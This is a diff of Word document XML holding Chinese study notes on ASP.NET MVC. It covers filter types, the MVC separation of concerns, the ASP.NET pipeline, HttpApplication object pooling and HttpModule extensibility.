-        <w:t>IActionFilter(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>动作过滤器</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>前</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>后</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="24"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ActionFilterAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="24"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>IResultFilter(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>结果过滤器</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>前</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>后</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ActionFilterAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>IExceptionFilter(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>例外过滤器</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>HandleErrorAttribute(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>在</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>FilterConfig</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>就已被注册</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="02696D"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="02696D"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>RazorViewEngine</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="02696D"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>视图引擎</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="02696D"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="02696D"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>WebApi</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-        <w:widowControl/>
-        <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
-        <w:spacing w:before="376" w:beforeAutospacing="0" w:after="452" w:afterAutospacing="0" w:line="23" w:lineRule="atLeast"/>
-        <w:ind w:firstLine="150"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FFFFFF"/>
-          <w:sz w:val="31"/>
-          <w:szCs w:val="31"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>ASP.NET MVC</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="a4"/>
@@ -11795,47 +10827,1237 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
-        <w:t>数据库技术</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
+        <w:t>框架</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ASP.NET MVC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，前者代码支撑该应用框架的技术平台，它表明</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ASP.NET MVC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>和传统的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Web Forms</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>应用框架一样，都是建立在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>平台上的；后者表示该框架背后的设计思想，意味着</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ASP.NET MVC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>采用了</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>MVC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的架构模式。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>一个典型的人机交互应用具有三个主要的关注点：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>数据的呈现，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>UI</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>处理逻辑和业务逻辑。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>自治视图</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>将三种柔和在了一起，势必会带来以下三个问题：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
+          <w:numId w:val="173"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>可测试性</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="173"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>稳定性</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="173"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>重用性</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>解决问题的办法是采用“关注点分离”，将数据的呈现，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>UI</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>处理逻辑和业务逻辑三者分离出来。这里采用的模式就是</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>MVC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>管道</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="174"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HttpApplication</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HTTPApplication</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>是整个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的核心，它负责处理分发给它的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HTTP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>请求。由于一个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HTTPApplication</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>对象在某一个时刻只能处理一个请求，只有完成对某个请求的处理后才能用于后续请求的处理，所以</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>采用对象池的方式来创建或获取</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HTTPApplication</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>对象。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="174"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HttpModule</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>拥有一个具有高度可拓展性的引擎，并且能够处理对于不同资源类型的请求。那么是什么成就了</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的拓展性</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>呢？</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HttpModule</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>功不可没。</w:t>
